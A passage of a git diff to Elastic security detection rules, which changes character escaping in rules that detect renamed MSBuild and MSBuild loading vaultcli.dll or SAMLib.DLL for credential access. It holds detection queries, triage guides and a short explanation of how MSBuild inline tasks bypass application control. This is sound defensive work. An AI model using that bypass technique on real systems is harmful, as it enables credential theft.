etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name == \"MSBuild.exe\" and\n not process.name : \"MSBuild.exe\"\n", "related_integrations": [ { @@ -53,7 +53,7 @@ ], "risk_score": 21, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_104.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_104.json index e9755b5007d..e7f9f3e8a8e 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_104.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_104.json @@ -16,7 +16,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Credential Access via Trusted Developer Utility", - "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via Trusted Developer Utility\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software.\n\nAdversaries can abuse MSBuild to proxy the execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file. MSBuild will compile and execute the inline task. `MSBuild.exe` is a signed Microsoft binary, and the execution of code using it can bypass application control defenses that are configured to allow `MSBuild.exe` execution.\n\nThis rule looks for the MSBuild process loading `vaultcli.dll` or `SAMLib.DLL`, which indicates the execution of credential access activities.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the `.csproj` file location.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via Trusted Developer Utility\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software.\n\nAdversaries can abuse MSBuild to proxy the execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file. MSBuild will compile and execute the inline task. `MSBuild.exe` is a signed Microsoft binary, and the execution of code using it can bypass application control defenses that are configured to allow `MSBuild.exe` execution.\n\nThis rule looks for the MSBuild process loading `vaultcli.dll` or `SAMLib.DLL`, which indicates the execution of credential access activities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the `.csproj` file location.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and (process.name : \"MSBuild.exe\" or process.pe.original_file_name == \"MSBuild.exe\")]\n [any where host.os.type == \"windows\" and (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (dll.name : (\"vaultcli.dll\", \"SAMLib.DLL\") or file.name : (\"vaultcli.dll\", \"SAMLib.DLL\"))]\n", "related_integrations": [ { @@ -88,7 +88,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_105.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_105.json index 6b431caa525..b484985bd67 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_105.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_105.json @@ -16,7 +16,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Credential Access via Trusted Developer Utility", - "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via Trusted Developer Utility\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software.\n\nAdversaries can abuse MSBuild to proxy the execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file. MSBuild will compile and execute the inline task. `MSBuild.exe` is a signed Microsoft binary, and the execution of code using it can bypass application control defenses that are configured to allow `MSBuild.exe` execution.\n\nThis rule looks for the MSBuild process loading `vaultcli.dll` or `SAMLib.DLL`, which indicates the execution of credential access activities.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the `.csproj` file location.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via Trusted Developer Utility\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software.\n\nAdversaries can abuse MSBuild to proxy the execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file. MSBuild will compile and execute the inline task. `MSBuild.exe` is a signed Microsoft binary, and the execution of code using it can bypass application control defenses that are configured to allow `MSBuild.exe` execution.\n\nThis rule looks for the MSBuild process loading `vaultcli.dll` or `SAMLib.DLL`, which indicates the execution of credential access activities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the `.csproj` file location.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and (process.name : \"MSBuild.exe\" or process.pe.original_file_name == \"MSBuild.exe\")]\n [any where host.os.type == \"windows\" and (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (dll.name : (\"vaultcli.dll\", \"SAMLib.DLL\") or file.name : (\"vaultcli.dll\", \"SAMLib.DLL\"))]\n", "related_integrations": [ { @@ -88,7 +88,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_106.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_106.json index 852c80159e5..f6d2846f298 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_106.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_106.json @@ -16,7 +16,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Credential Access via Trusted Developer Utility", - "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via Trusted Developer Utility\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software.\n\nAdversaries can abuse MSBuild to proxy the execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file. MSBuild will compile and execute the inline task. `MSBuild.exe` is a signed Microsoft binary, and the execution of code using it can bypass application control defenses that are configured to allow `MSBuild.exe` execution.\n\nThis rule looks for the MSBuild process loading `vaultcli.dll` or `SAMLib.DLL`, which indicates the execution of credential access activities.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the `.csproj` file location.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via Trusted Developer Utility\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software.\n\nAdversaries can abuse MSBuild to proxy the execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file. MSBuild will compile and execute the inline task. `MSBuild.exe` is a signed Microsoft binary, and the execution of code using it can bypass application control defenses that are configured to allow `MSBuild.exe` execution.\n\nThis rule looks for the MSBuild process loading `vaultcli.dll` or `SAMLib.DLL`, which indicates the execution of credential access activities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the `.csproj` file location.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and (process.name : \"MSBuild.exe\" or process.pe.original_file_name == \"MSBuild.exe\")]\n [any where host.os.type == \"windows\" and (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (dll.name : (\"vaultcli.dll\", \"SAMLib.DLL\") or file.name : (\"vaultcli.dll\", \"SAMLib.DLL\"))]\n", "related_integrations": [ { @@ -87,7 +87,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_107.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_107.json index 4788db1768b..770b7e2df38 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_107.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_107.json @@ -16,7 +16,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Credential Access via Trusted Developer Utility", - "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via Trusted Developer Utility\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software.\n\nAdversaries can abuse MSBuild to proxy the execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file. MSBuild will compile and execute the inline task. `MSBuild.exe` is a signed Microsoft binary, and the execution of code using it can bypass application control defenses that are configured to allow `MSBuild.exe` execution.\n\nThis rule looks for the MSBuild process loading `vaultcli.dll` or `SAMLib.DLL`, which indicates the execution of credential access activities.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the `.csproj` file location.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n 